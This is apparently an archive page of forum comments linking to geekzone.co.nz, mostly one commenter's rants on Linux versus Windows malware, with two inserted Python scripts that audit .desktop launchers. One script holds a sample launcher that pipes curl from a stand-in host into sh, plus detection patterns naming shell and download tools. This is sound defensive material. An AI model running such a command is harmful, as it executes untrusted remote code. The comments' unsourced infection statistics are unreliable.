Domain: geekzone.co.nz
Stories and comments across the archive that link to geekzone.co.nz.
Comments · 141
-
Re:Yeah but...
Sigh....how to write a Linux virus in 5 easy steps using the same tricks malware uses, BTW wanna guess what kernel hosts the OS that has surpassed Windows in infections and has for over 5 years? That's right sparky LINUX.
So your vaunted "source" means absolutely nothing, it's classic security by obscurity. Wanna guess how much of your average Linux distro is actually vetted, as reported a couple years back by a scan of GitHub access by a security firm? Less than 2%, that is all; the other 98% hadn't been touched by anybody but the authors, who could have put any malware they wanted into it and you wouldn't know any more than if you were on Windows or OSX.
BTW I'll be happy to smack you with some citations if you'd like, from the KDELook bug that was hosted on all the major KDE repos for over a year to the Quake 3 malware that was hosted on all of the major repos for a year and a half, just ask. Thanks to Android we now have undeniable proof that Linux security is nothing but security by obscurity, and that if a malware vendor wants to own Linux? It gets pwned just as hard.
-
Re:This is it! The year of the Linux desktop!
Sigh....how to write a Linux virus in 5 easy steps along with the follow up rebuttal that shows its actually easier than the author first thought, using NOTHING but the exact.same.tricks. used on Windows users. And please note we have already seen these kinds of tricks DO work on Linux users, the KDELook bug anyone? Or the infected Quake 3 that sat in a repo for nearly a year?
The moral of the story is this...there is no such thing as a secure OS if the user has control of the system because the user is frankly the easiest part of any system to exploit. think the PCs I see infected at the shop got that way from Windows exploits? Nope they ALL end up that way from a variation of the classic "dancing bunnies problem". You make your malware look like something the user really wants, user bypasses the security to get it, user gets pwned....what part of that required a specific OS? Oh yeah NONE because it has jack and squat to do with the OS, its exploiting the USER.
So hold on to that dream pal, the insane number of Android infections, which just FYI hit the million infected mark 3 times faster than Windows hit that milestone, has driven a stake through the lie that the Linux kernel somehow has magical anti-malware powers. You move say 10 million windows users to Linux so its a target worth hitting? it'll be pwned before the holiday weekend is over.
-
Re:Security theater
Which is what makes it a lot more dangerous. I'll just leave these here for your perusal. Oh and be sure to respond with a typical fanboy "but but but those don't count!" just like the Apple iHeads did when MacDefender came out and they went from "Apple doesn't get viruses" to "that doesn't count because its technically not a virus, its a trojan!" LOL.
-
Re:Windows only
Uhhh...you DID read TFA, yes? It's a browser based on Chromium and Chromium is cross platform so all they have to do is compile it for Linux and OSX. And if you think it's hard to get an end user infected on Linux it's actually surprisingly easy using the same way most malware is spread, social engineering. Remember the weakest link in ANY security system is always the user, doesn't matter what the OS is.
-
Re:Not in the PPA
And that makes it all moot, because the user is always the weakest link and malware doesn't need root to do the tasks most malware writers want your PC for.
As for how easy it really is? I'll just leave this here along with the follow up which points out ways to make it even easier to infect Linux boxes.
-
Re:Windows !!!
Sigh...Linux has more vulnerabilities than Windows by 3 to 1 in 2014, Windows beats iOS, OSX, and Linux in least number of vulnerabilities in 2014, and how to write a Linux virus in 5 easy steps targeting the same weakness that more than 90% of malware target, the user...HAND.
-
Re:A joke?
So in other words....they are FOSSies and are doing it on religious grounds rather than on the merits of the OS or even its functionality?
In that case I agree with you 100%, because if they are getting viruses in 2014 then its because of PEBKAC and those same people will end up somebody's bitch on Linux so as a member of the Windows community allow me to say thank you, please keep them. Better they cause millions of Linux infections than cause Windows ones, thx!
For everybody else Windows 7 is solid as a rock, Windows 10 looks to be even nicer in every way, and with both you have to REALLY go out of your way to be a booger picking moron to get yourself infected, what with the sandboxing, ASLR,DEP,low rights mode, Windows Defender, auto updates, one has to be a real drooling idiot to get themselves infected...I should know, I run a PC repair shop and see quite a few and ya know what? Damned near every.single.one. says something along the lines of "I knew I shouldn't click and run that, I really did, I don't know why I did that"...well I do its the same reason the "How to write a Linux virus" works just fine (which it does BTW, see the KDELook bug for just one example) its called social engineering, which is how more than 95% of Windows bugs end up installed.
So I personally wish all the "virus carrying click on everything" types go to your OS, I really do. From the looks of the Android malware they will be happy to spread their STDs to your OS just as they did to ours, so please accept these plague bearers with our compliments!
-
Re:https is useless
how to write a Linux virus in 5 easy steps using the exact same tricks used to infect Windows. Say that is only hypothetical? How about some real world pwning like kernel.org and its not a fluke by any means. Oh and what happens when the "secure" Linux kernel gets used by a target worth hitting? A million plus infected systems that is what.
Linux "security" is security by obscurity, simple as that. The "many eyes" myth was proven false by Heartbleed which sat there for fricking years without being caught, the ONLY advantage having the source gets you is the ability to keep old versions alive after the devs move on....that's it,that's all. Hell by the time one was to do even a piss poor code audit of even a tenth of a single distro release it would have been abandoned for 5+ NEW releases that your audit wouldn't cover, see how Ubuntu is on track to have 20 mainstream releases in the same support window as Win 7 for example.
Source code isn't magic and considering how many thousands of people work on the code that goes into a single distro sticking a state actor in the mix would be trivial if the state desired it.
-
Re:Trusted program, untrusted use
Oh please do you REALLY think that is the cause of Windows infections?
I got news for ya pal, I fix the systems that get pwned 6 days a week and I can tell ya that hasn't been even a major, much less main, source of infections since 2004 or so. How do Windows systems get infected? The same way this page shows you how to infect a Linux system in just 5 steps through good old fashioned social engineering. Here are the top sources of infections I see at the shop, I see these constantly..
1.- "You want to see teh hot lesbos? Just run 'Iz_Not_Viruz_Iz_Codex' to see teh hot lesbos today!" 2.- Hi, this is your (insert name of person they know whose system has been pwned) and I found something really cool! Just click this link (which goes to a page full of drive bys) to check it out!" 3.-ZOMFG u got teh viruz! Just run 'Iz_Not_Viruz_Iz_Cleanerz' to get rid of it ZOMFG!" 4.- "You are teh winrar of our contest! Just give us all your info on this page (so we can pull an ID theft while infecting you with drivebys) so you can get your prize u lucky dog!"
These work on ANY system because they target the weakest point, THE USER. As a matter of fact I've been seeing a sharp rise in infected Android smartphones and ID thefts from that last one. It seems that folks just can't equate one system to another so all those scams that haven't worked on a PC in a decade? Work great on a smartphone. Its endless September all over again. BTW please note that in NONE of those, nor in the Linux example does the OS matter because the weak spot hasn't been the OS in ages, the easy target has been and always will be the users.
-
Re:NoScript
Are Linux users? After all they are even more trivial to infect than Windows and Android, so beloved and claimed by the Linux community hit the 1 million infected mark last year, a full 9 years earlier than it took Windows to reach the same number BTW, so are they gonna pay or bugger off? Excuse me "go write a Bash script" would be the more apropos line.
Don't mistake security by obscurity for actual security as they are VERY different. The *BSDs with the constant code audits and insane amount of hoops required to put anything in mainline? That is REAL security, whereas with Linux...well let me put it THIS way, you have over 700 projects in your average distro which 1.- they never talk to each other, 2.- they are each "doing their own thing" without regard to what the others are doing, and 3.- they have ZERO care for anybody's project but their own, so if Torvalds futzes with the kernel and breaks the wireless subsystem? Too bad so sad.
The only reason Linux lasted as long as it did was less than 1% on the desktop. and don't waste your breath trotting out the "Linux runs on servers" TMRepo meme, as servers are stripped to the bone, running an OS that may as well be embedded for how little it has, and are managed by guys that spent many years studying to learn how to run servers securely. you give those same Linux admins a Windows server and they'll be just as secure, you can even have a headless server with only what you require installed thanks to WinServer Core.
So before you throw stones next time you might want to look at the glass house you are living in bud.
-
Re: Price?
Flag on the field, 15 yard penalty for "magical thinking".
Would you too like to know how to write a Linux virus in 5 easy steps icebike? Its trivial and uses the exact. same. methods. that the Windows viruses use, in fact it would be quite trivial to make them cross platform! Oh but "that wouldn't work IRL" you say? Might want to tell that to the owners of all these infected Android systems. BTW please note the date of the second article, last figures I saw now had the number of infected over the million and a half mark but since I couldn't find a reliable source for those figures and didn't want anyone saying I'm picking facts I went with the older article.
Go ahead and try the first article for yourself icebike, you ARE running Linux, correct? It has step by step instructions and works just like the "KDE Look" bug that spread through the KDE community did a couple years ago. When you do and see that they infect the system just fine maybe then you'll accept that Linux security is security by obscurity and realize these companies buy windows FOR A REASON and its because you have one company to call that is in charge of the whole stack. Oh and don't bring up servers, those are stripped to the bone, have nothing running that is not absolutely required AND locked way the hell down. I can do the exact same with Windows embedded and NOT have to rewrite a couple hundred grand to a couple million in code to work on an OS that is unsupported unless I write big checks per unit to Red Hat.
Sorry icebike but no matter how you slice it? Your math don't work. If it did these banks would be happy to switch, think they have ANY loyalty to anybody but their own bottom lines? But just as all the retailers large and small refuse to carry your brand in house because they have found it wanting, so too has the financial sector tried your OS and with the exception of a few server roles it's been passed on.
-
Re:It's true -- but only root can read them though
Actually in some moist delicious irony Windows does NOT store the WiFi password unencrypted, the last one that did was WinXP which was deprecated and is all but abandoned by MSFT, the rest? Store it in an encrypted XML file which the system and NOT the user has the keys for, so the only way for them to get it would be to somehow corrupt the WiFi password file AND disconnect the session so the user would be forced to re-input the password while they were monitoring.
And it is very MUCH relevant as I was attempting to point out that a good 9 times out of 10 the weakest link is NOT the operating system, its the user. Apparently you didn't follow the narrative for whatever reason, so I will elaborate. See this how to write a Linux virus in 5 easy steps page? It works the exact same way that pretty much every current bit of malware on Windows, from the "free porn codec" to the security tool and FBI porn bug variants work and that is by fooling the user in order to get them help the malware writer past the defenses.
Go look at the top 10, hell the top 50 malware infections and guess what? They ALL work the same way, get the user to help lower the defenses. All TFA shows is that once a malware writer gets a Linux user to lower the defenses the system will be that much trivial to pwn, that's all. But at the end of the day the vaunted "Linux security" is worth a bucket of piss against the top 20 malware writers because they all know where the weakest link in the security chain, as those million Android infections show Linux security PEBKAC.
-
Re:It's true -- but only root can read them though
Except with it stored unencrypted they don't NEED physical access, they merely need you to follow a few simple instructions and download their "free codec" or similar trick.
Linux fanboys can scream bloody murder and waste modpoints but that won't change reality and reality is its almost never the OS that is the weakest link, its PEBKAC. Hell look at Windows from Vista on up, you have the user running as a user and requiring elevation for anything more than trivial changes (sound familiar?) and it goes even one better than Linux by having the browser by default run with the lowest possible privileges, yet systems STILL get pwned, why? PEBKAC.
Linux users, like the Mac users before them got away with not having to worry about such things thanks to security by obscurity, but just as MacDefender signaled the end of that perk in OSX so too has the million Android infections signaled the end of SBO for Linux. I've seen Linux machines pwned in a week (look up the "KDE Look" bug for just one example) and I've seen Win2K boxes go from RTM to EOL without a single bug because at the end of the day its not the OS, although storing passwords in plain text is just stupid, but ultimately whether a system is secure or not comes down to whether the user has common sense and follows best practices.
Remember folks no matter how hard you work to foolproof a system the world will always come up with a bigger fool.
-
Re:Dupe Plus Packs Two Articles into Same Subject
Sorry, gotta throw a flag, bullshit on the field. if anything Linux (which the community is quick to claim Android as their own) is MORE vulnerable than Windows as Android has reached over a million infections a full decade faster than Windows reached that milestone BTW, and unlike Windows which has several damned good sandboxing antivirus packages, including some really good free ones, Google has made sure that antivirus on android is useless as they have no way to uninstall or even stop a malicious app.
Of course the whole thing just proves what many of us have been saying for years, that Linux is just as easy to infect if not more so than Windows and OSX and that once Linux gained any popularity, so that it was no longer benefiting from security by obscurity, it would pay the price. Oh and before anybody chimes in with the totally pointless tidbit about Linux servers? You see those are actually administered by these things called...wait for it..."server admins" that have had years of education and experience before being let loose on those systems. Linux benefited from security by obscurity in the consumer space because so few actually used it in that arena, Google ended that with Android.
So ironically the act that Windows has functional sandboxing antivirus may actually help to keep these android systems from getting infected, instead of the other way around.
-
Re:OMG enough
Not to mention have you SEEN the winners of the obfuscated C contest? the kind of guys that get jobs with the NSA frankly aren't THAT damned sloppy!
At the end of the day it really doesn't matter though, as we have seen with the Tor nodes being run by the NSA there is more than one way to skin the cat and anybody can write a Linux virus in 5 easy steps by simply targeting the same weak link as on Windows and OSX...the user. BTW anybody that doesn't think it would work should look up the "KDE Look Bug" that worked by using the classic trojan move of bundling malware with something the user wants, in that case a theme and screensaver for KDE.
So the moral of the story is there really is no need for the big bad to manage to hack the Linux kernel, or the Windows or OSX kernels, there are a million other ways to gain control of the system. Quick, show of hands, how many here have done a code audit on Libre Office? Firefox? What about all those little programs that end up in every distro, from the stylish digital clocks to the little googly eyes app? How many have done a serious security minded code audit on those? Just remember because something COULD have been done does NOT mean it HAS been done, after all someone could become a zombie but I really don't think I need to worry about the undead eating my brains, do you?
This is just a wake up call that NO OS is immune, no OS is magically free from zero days or attacks, that is magical thinking and ask all those OSX guys that got MacDefender and macGuardian bugs where magical thinking gets you.
-
Re:The world's largest botnet
Not only is it a myth you can show with basic common sense WHY its a myth.
You have something like 40 MILLION lines of code making up even the thinnest Linux distro, right? Now programs on average with FOSS have two to four releases a year, some like FF even higher.
Now for "many eyes" to be true ALL of what I'm about to post HAS to be true or many eyes is false...1.- you have to have people with the education and experience in both code AND steganography AND obfuscation, for why you have to have that look at the obfuscated C contest to see how even when you know there is malware how well it can be hidden, 2.- those people HAVE to look at not ONLY the code but ALSO all that it interacts with, for why you have to have that look at payload malware where by itself it is harmless but when mixed with a second program turns nasty, and finally 3.- They have to be willing to check not ONLY this one version but EVERY release for both the program AND the subsystems!
The "many eyes" myth works on the fallacy that states because something COULD be done it HAS been done. Well there COULD be vampires in the world but I don't think I need to carry a stake, do you? if I wanted I could wallpaper this page with Linux malware links but I think an even better answer is to show how you can write a Linux virus in 5 easy steps which will work on pretty much ANY distro, how? By exploiting the weakest link, like any virus...the user. And for those that Linux users wouldn't fall for those? look up the "KDE Look Bug" to see thousands of Linux users that got pwned by a screensaver and theme.
-
Re:so pony up, Microsoft want agile extreme only
The same can be said of Windows except you'd be opening it up to malware and guess what? The same applies to Linux. How fricking sad is it that you will sit here with a straight face and tell me i should leave my users vulnerable with a badly out of date OS? And you HAVE to do the forced upgrade deathmarch because Linux don't support previous versions for shit because "Hey its free!" well so is that dogshit in the park but I don't want to be handling it either.
At the end of the day there is a reason why more people risk hefty fines and in some regions even jail time to steal the competitor's product than take yours for free by several orders of magnitude and that is because Torvalds is a shitty developer who refuses to let go of a broken driver model he ripped off of UNIX in 1993. I mean can you imagine how much you'd be laughing if Windows kept the creaking and buggy as fuck
.VXD driver model in 2013? that shit would be hilarious, right? Well that is EXACTLY WHAT TORVALDS HAS DONE by keeping the ancient fucked up POS dependency hell breaks constantly "let the devs do it" driver model which in the end leaves you with shit like this, with drivers that are half assed, piss poor, and break often.Again feel free to take the Hairyfeet Challenge and try for yourself and see if 1 or more drivers aren't completely trashed by the end. For extra points try it on a laptop and see how quickly Linux shits all over the wireless. the Hairyfeet Challenge actually rigs things in Linux' favor by asking for only HALF the support Windows gets and on top of that I didn't even use anything exotic, we are talking boring bog standard hardware that is in a good 90% of the desktops and laptops and it STILL shit all over itself. If the Linux community wanted to pay me for the bandwidth and time I'd be happy to film it live but frankly the challenge is so easy to replicate at home that anybody can do it, all you need is a bog standard desktop or laptop and a copy of whatever distro you want to test from 5 years ago which you will then upgrade/date to current through the GUI as Joe and Jane Normal would be expected to do.
At the end of the day the Linux driver model is deep fried tampons and as long as Torvalds is in the big chair it will stay that way because he is old and cares more about "purity of essence" than having a functional OS. Hell even basic common sense will illustrate that the math don't work when it comes to drivers, when Torvalds adopted that driver model you could fit every Linux driver on a single floppy, now you have over 100,000 drivers, hundreds of new drivers released each month and MAYBE 300 devs (I'm pretty sure it isn't even half that, just giving Torvalds the benefit of the doubt) that are qualified to do low level driver debug and testing. If you mainlined pure coke into their veins and kept them working 24/7 then you would MAYBE have each driver looked at once every 6 years MAYBE.
There is a reason why every B&M shop that has tried Linux has dropped it, from little shops like mine to giants like Walmart, why simply shopping for devices to use with Linux quickly becomes a game of hardware roulette and why drivers get shit on constantly when you update/grade and that is because the driver model just doesn't work. But when you get any of the devs on here the only explanation you get is either Torvalds "It wouldn't let me just tweak whatever I want at any time" (yeah jackass, that is kinda the damned point, to keep you from breaking shit) or worse that kernel dev who said, I swear to God, that "I hope every non free driver breaks often!". Yeah because users don't want functional hardware, all they care about is the racial purity of the GPL. BTW in a case of irony moist and delicious what does every forum tell you to buy for video? Nvidia because their proprietary drivers actually fucking work!
After nearly 5 ye
-
Re:Not just Win8
-
Re:I don't think you ought to run Windows...
Note that Linux desktop was not free of stupid features either:
http://www.geekzone.co.nz/foobar/6229
-
Re:someone's spying on you
Do I REALLY need to wallpaper this page with articles about Linux malware? Or point out how to write a Linux virus in 5 easy steps again?
And if you are gonna talk about me at LEAST get the facts right, I have said time and time again that Linux is great on servers, its great on embedded, where it sucks royally is the desktop. And if he isn't a novice then WTF is that Ask Slashdot anyway? if he wasn't a novice he'd know enough basic troubleshooting to figure this out on his own, but if you read TFS its pretty damned obvious his idea of "not a novice" is that he can install the OS, otherwise we wouldn't even be having this conversation.
But no matter what you, I or anybody else thinks about Linux the simple fact of the matter is this is NOT the right place for this question, it should be in the forums where they can ask follow ups and work their way through the problem, all he is gonna get here is wild guesses at best. This isn't one of those Ask /. questions where you can just say "Oh do this" or "oh you need that" to solve it, it's gonna take some back and forth to get to the root of the problem.
-
If Linux is vulnerable?
A KDE file launcher script
-
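The story above and the comments that keep citing the "Linux virus in 5 easy steps" page all turn on the same thing: a freedesktop launcher (.desktop file) whose Exec= line runs whatever the attacker wants once the user double-clicks what looks like a document. The script below is an added example, not code from the original page or from the linked article; it audits .desktop files for that pattern. The heuristics, the directory layout and the two sample launchers are assumptions constructed for the example.

```python
"""Audit freedesktop .desktop launchers for the 'run what the user was handed'
trick.  Added example; the heuristics and the sample launchers are assumptions."""
import re
from pathlib import Path

# Exec= contents that a launcher arriving as a mail attachment or download has no
# legitimate reason to carry (assumed heuristics, tune to taste)
SUSPICIOUS = [
    (re.compile(r"\b(sh|bash|dash|zsh)\s+-c\b"), "spawns a shell with an inline command"),
    (re.compile(r"\b(curl|wget)\b"), "fetches content from the network"),
    (re.compile(r"\bbase64\b"), "decodes an embedded payload"),
    (re.compile(r"(^|[\s=])(/tmp/|~/Downloads/|\$HOME/Downloads/)"),
     "runs something from a download/temp location"),
    (re.compile(r"\b(chmod\s+\+x|crontab|nohup)\b"), "sets up execution or persistence"),
]

# Constructed sample launchers (not real files from anywhere)
SAMPLE_BENIGN = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=accessories-text-editor
Terminal=false
"""

SAMPLE_MALICIOUS = """[Desktop Entry]
Type=Application
Name=holiday_photos.jpg
Icon=image-x-generic
Exec=sh -c "curl -s http://example.invalid/p | sh; xdg-open ~/Downloads/holiday_photos.jpg"
Terminal=false
"""


def parse_desktop(text):
    """Return the [Desktop Entry] group as a dict.  Keys with locale suffixes such as
    Name[de] are kept as written.  Minimal parser, not a full spec implementation."""
    entry, group = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            group = line[1:-1]
            continue
        if group == "Desktop Entry" and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def audit_launcher(text):
    """Return a list of findings (strings) for one .desktop file; empty means clean."""
    entry = parse_desktop(text)
    findings = []
    if entry.get("Type", "Application") != "Application":
        return findings  # Link and Directory entries carry no Exec
    exec_line = entry.get("Exec", "")
    for pattern, why in SUSPICIOUS:
        if pattern.search(exec_line):
            findings.append(why)
    # The social-engineering half: a visible name that pretends to be a document
    name = entry.get("Name", "")
    if exec_line and re.search(r"\.(pdf|jpe?g|png|docx?|odt|zip)$", name, re.I):
        findings.append("Name looks like a document but the entry executes a command")
    # Terminal=false hides the command's output, so the user sees nothing happen
    if findings and entry.get("Terminal", "false").lower() == "false":
        findings.append("runs without a terminal, so the user sees nothing")
    return findings


def audit_directory(path):
    """Audit every *.desktop file directly under path; returns {filename: findings}."""
    return {p.name: audit_launcher(p.read_text(errors="replace"))
            for p in Path(path).glob("*.desktop")}


if __name__ == "__main__":
    for label, sample in (("benign", SAMPLE_BENIGN), ("malicious", SAMPLE_MALICIOUS)):
        print(label, audit_launcher(sample) or "clean")
```

Point it at ~/Downloads or ~/Desktop with audit_directory; anything that comes back with findings is exactly the kind of launcher the comments above describe, and on most desktops it will also need the executable bit or a "trust this launcher" click before it runs, which is the prompt the user is being talked into accepting.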
Re:the only thing Microsoft and others can do is..
First of all a public service announcement: To everyone that writes "M$" in 2013...This...Is...YOU! and this is what everyone sees and instantly dismisses when you write that lame ass M$ in 2013. You could write the most brilliant post in the history of Slashdot but a good 80%+ will NEVER read it because they see M$ and think "douchebag" and move on. So don't waste your time unless you want people posting your group photo as the very next post.
Second of all lets get something VERY clear for those that don't seem to understand how these things work, okay? ALL OPERATING SYSTEMS that would be what we consider "modern" are some of the most complex pieces of software EVER written, we are talking millions of LOC in the kernel alone and thousands of little sub-programs that ALL have to work in concert to give the user the illusion that its all one program that "just works". Is Linux even close to immune? Not only is that a big NO but to even suggest it is is a symptom of what is known as "magical thinking" such as "If you buy (product X) then you will magically be safe!". We in IT have seen magical thinking used to sell everything from OSes to firewalls to routers and reality will blow holes in that lie every single time.
So if Linux is vulnerable why don't we see Linux attacks in the news? We do only they are called "Android attacks" and in fact its predicted that later in the year Android will reach the one million infected mark which considering that Android isn't even a decade old is pretty impressive.
Look it's actually VERY simple, and evidence has borne this out time and time again. Criminals ARE LAZY and want to do the least amount of work for the biggest bang so they want to go after the biggest targets to yield the most infections they possibly can. I mean writing an OS/2 virus today would probably be the most trivial thing in the world yet you don't see anybody doing it, why? Because the fact is even though eComStation still sells OS/2 there are too few using it to make it a juicy target. But the malware writers WILL go where the targets are, used to be it was always Windows, then Vista bombs and everyone in the press starts talking about how Mac adoption is climbing, what happens? Mac Guardian and Mac Defender. Android phones and tablets explode in usage, what happens? Thousands of Android malware released weekly.
So anybody who thinks their OS is gonna magically protect them from malware because "(product X) doesn't get bugs!" is merely deluding themselves with magical thinking. There are even articles that helpfully explain this and point out how switching platforms just for the sake of magical thinking (in the article OSX for Linux but you can insert any from and to in there and it still fits) just doesn't work. Be it Linux, Mac, or Windows you can find plenty of bugs, I could spend 5 minutes and cover this page in reports of bugs for all 3, I already listed the 2 biggest Mac bugs of recent memory, TFA is a Windows bug, and just off the top of my head there was the KDELook theme bug and the infected Quake 3 that was served up by most repos for a year and a half on Linux. NO OS is safe, NO OS is immune, and if you are gonna claim security by obscurity is actual security you might as well run Win95 or BeOS because hey, there aren't any bugs circulating targeting those OSes either.
-
Re:Biology research skewing my perspective ...
Well considering the how to write a Linux virus in 5 easy steps article uses Python and when I search for "Python malware" I get over 600,000 hits? There is probably plenty of Python malware already out there, it just doesn't get as much press as a Windows bug as it has a smaller target. But as long as there is the potential to make money on infected machines I'm sure that somebody will be targeting just about every combo of language and OS you can think of, no OS is immune to a targeted attack.
Now that said I have to deal with some customers that are...sigh...can you say "click happy" and clueless? So after many hours of trying various combos on test boxes here at the shop I have come up with what I call my "foolproof Windows for fools" that makes the machines as solid as tanks and cuts the living hell out of the risk of malware. basically short of them going "Why yes, please infect my machine" which sadly I have had to deal with at least once, well short of them going the extra mile to be super stupid you'll have a system that short of hardware failure won't be going anywhere. For those that want to know how, recipe is as follows:
1.-First make sure their software is all up to date and Windows is set to automatically download and install patches, otherwise they are likely to just ignore the patches and leave the machine vulnerable.
2.- Get a low rights mode browser with ABP, any Chromium based will do but I use Comodo Dragon as it has privalert which will block all the tracking crap and you can choose to use Comodo Secure DNS in the browser only, this helps to block a LOT of infected websites from loading in the first place.
3.- For an AV I recommend either Avast Free or Comodo IS, both have their pluses. Avast AV is a little more "chatty" about what it's doing and I found some folks really like that, Comodo IS has built in sandboxing and is easy to configure for the actual user, so it's really up to you as both are quite good at stopping malware.
4.- Install FileHippo Update Checker and have it set to run at startup, it only uses a couple hundred KB of memory and will tell them when their third party software is out of date as well as provide links to the software, this keeps them from downloading "flash updates" and other dubious software updates. If the Hippo doesn't say it needs updating then it doesn't need updating.
5.-Finally you need to have a hidden backup and restore partition, just in case they ever manage to figure a way to get infected or if a family member comes over and trashes things. I am testing Paragon Drive Backup for this role but since I haven't finished testing I'd have to go with Comodo Time Machine, but be aware it's no longer supported and I don't think it's been tested with Windows 8. That said the nice thing here is you can lock a snapshot with everything set up and all the third party software loaded so you have your own "OEM restore partition" without the trialware crap and it can also create snapshots on a schedule and be accessed if the machine can't even boot to desktop by just pushing the Home key. This way if they manage to somehow seriously screw up the OS a single push of the Home key and 20 minutes later they are back up and running.
With these 5 little steps, which take less than an hour all told, you will have a machine you can let the most clueless users get a hold of and not have to worry about them borking the system. I have several "click happy" customers that have been on this system for over 2 years now and not a single bug, it runs just as good as when I handed it to them. In fact I have only had to help one that has been on this system, she forgot to log off and her 16 year old niece got on after she left and did God knows what to the system so it wouldn't boot to desktop. 15 minu
-
Re:Muha
And you don't even have the balls to make an account so why should anybody listen to you? Oh and here is How to write a Linux virus in 5 easy steps but you hang onto that "magical thinking" because it sure did protect all those Apple users from the non-existent MacDefender and MacGuardian...oh wait. Well it at least protected all those Android users because of the excellent Linux kernel protecting them...oh wait.
NEWS FLASH: there is NO SUCH THING as an OS that doesn't have bugs and vulnerabilities, which is why you airgap sensitive systems. All your "solution" does is use security by obscurity alongside a truly shitastic ecosystem where a billion devs "do their own thing" and make changes for the sake of change, make things incompatible for no damned reason other than they can, and where the kernel on up is like shifting sand with ZERO QA or QC so the driver that works now probably won't work when the 6 month upgrade deathmarch comes. Hell even one of the Red Hat devs says the current desktop is shit, and you wanna hoist it off on somebody who is barely able to use a PC? Yeah, maybe if he hates his dad's guts and wants to see him suffer. After all a broken machine is 100% virus proof as well, not gonna be very useful though.
-
Linux virus
If you think Linux has a magical immunity you might want to read how to write a Linux virus in 5 easy steps which shows with just a little social engineering it's really not hard to target Linux just as the malware writers target Windows and OSX now.
From the article you mention:
A step that could be taken by the Gnome and KDE developers: Require launchers to have execute permissions. A saved attachment won't have those. Therefore, even though a syntactically correct and properly named launcher was dropped on the desktop a user can't just click on it and start it if the execute bit is not set.
Done. Modern versions of KDE need launchers to have execute permission. That hole is patched.
And nobody pretends that Linux has some magical immunity to viruses. As a Unix-like OS it just follows a few key principles:
- Don't blindly execute everything. Require executables to be explicitly marked as such (thus any shit downloaded from the web or from e-mail won't automatically be launchable).
- Don't run constantly as root. Thus the amount of harm that a program can do is limited to the access rights of a user. (While this still makes it possible to send spam, mine the data of the user, and modify the user profile, at least it prevents further, deeper compromising of the running system.)
That doesn't magically solve all malware problems in the universe. But at least it makes the life of a malware writer a little bit more complicated. And the 5-step virus relies on a work-around of the first rule, which has since been corrected. Back then, these no-brainer principles were NOT followed by Windows XP, making it even easier to write worms spreading over e-mail. Thankfully, since then Vista has arrived and has brought UAC dialogs in these situations (now how much dialogs can help security problems when the users are used to clicking "okay" on everything, that remains to be seen).
Or did you think Android runs on Windows?
Android is a completely different beast and instead of a Unix-like userland it uses its very own userland (a Java-like system).
Though it doesn't allow execution of arbitrary e-mail attachments either. It's not impossible to write Android malware, even malware that finds a way to look legitimate to Android's capability system. But at least the scenario "Here are some pics of hot lesbian teens! Click on the attachment to view them!" doesn't work on modern OSes. Except Windows (and that's until WinXP; starting from Vista, you get a UAC dialog telling you that you are running an executable from an untrusted source - now how many idiots will click on "okay" anyway is a different story).
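As an added illustration of the launcher rule described in this post (this is not code from the post, from KDE or from GNOME), the following Python scans a directory for .desktop files and reports which of them would run on click under the "execute bit required" policy; the two sample launchers it writes to a temp directory are constructed for the demo.

```python
import os
import stat
import tempfile
from dataclasses import dataclass
from typing import Dict, List, Optional

# Added example: mirrors the rule the post above describes (a .desktop launcher
# only runs when its execute bit is set). It is not KDE's or GNOME's own code,
# and the sample launchers written to a temp directory are constructed here.


@dataclass
class LauncherCheck:
    path: str
    exec_line: Optional[str]   # value of the Exec= key, if any
    is_app: bool               # Type=Application
    executable: bool           # any execute bit (user/group/other) set

    @property
    def launchable(self) -> bool:
        # Post-fix policy: an application launcher with an Exec= line runs
        # on click only if the file also carries an execute bit.
        return self.is_app and self.exec_line is not None and self.executable


def parse_desktop_entry(text: str) -> Dict[str, str]:
    """Minimal parser for the [Desktop Entry] group of a .desktop file."""
    entries: Dict[str, str] = {}
    in_group = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            # Only keys inside [Desktop Entry] matter for the launch decision.
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip()] = value.strip()
    return entries


def check_launcher(path: str) -> LauncherCheck:
    with open(path, encoding="utf-8") as fh:
        entries = parse_desktop_entry(fh.read())
    mode = os.stat(path).st_mode
    executable = bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
    return LauncherCheck(
        path=path,
        exec_line=entries.get("Exec"),
        is_app=entries.get("Type") == "Application",
        executable=executable,
    )


def scan_launchers(directory: str) -> List[LauncherCheck]:
    """Check every .desktop file in a directory (e.g. a user's Desktop)."""
    return [
        check_launcher(os.path.join(directory, name))
        for name in sorted(os.listdir(directory))
        if name.endswith(".desktop")
    ]


def launchable_names(directory: str) -> List[str]:
    return [os.path.basename(c.path) for c in scan_launchers(directory) if c.launchable]


def blocked_names(directory: str) -> List[str]:
    """Launchers that would have run before the fix but are refused now."""
    return [
        os.path.basename(c.path)
        for c in scan_launchers(directory)
        if c.is_app and c.exec_line is not None and not c.executable
    ]


def build_demo_dir() -> str:
    """Constructed sample: one saved 'attachment' launcher and one real one."""
    d = tempfile.mkdtemp(prefix="launchers-")
    # A launcher saved from e-mail: well formed and named like a picture,
    # but a saved attachment is written without an execute bit (0644).
    dropped = os.path.join(d, "hot_pics.jpg.desktop")
    with open(dropped, "w", encoding="utf-8") as fh:
        fh.write("[Desktop Entry]\nType=Application\nName=hot_pics.jpg\n"
                 "Icon=image-jpeg\nExec=echo this would have run\n")
    os.chmod(dropped, 0o644)
    # A launcher the user (or a package) created and marked executable.
    editor = os.path.join(d, "editor.desktop")
    with open(editor, "w", encoding="utf-8") as fh:
        fh.write("[Desktop Entry]\nType=Application\nName=Editor\nExec=kate %f\n")
    os.chmod(editor, 0o755)
    return d


if __name__ == "__main__":
    demo = build_demo_dir()
    for check in scan_launchers(demo):
        verdict = "runs on click" if check.launchable else "not launchable"
        print(f"{os.path.basename(check.path)}: {verdict}")
```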
-
Re:Expensive
Despite your "Windoze" comment frankly it wouldn't matter what OS you are running because when you are dealing with a targeted attack such as this the enemy knows what you have and therefore can simply tune the attack to the OS, just as we saw with Stuxnet.
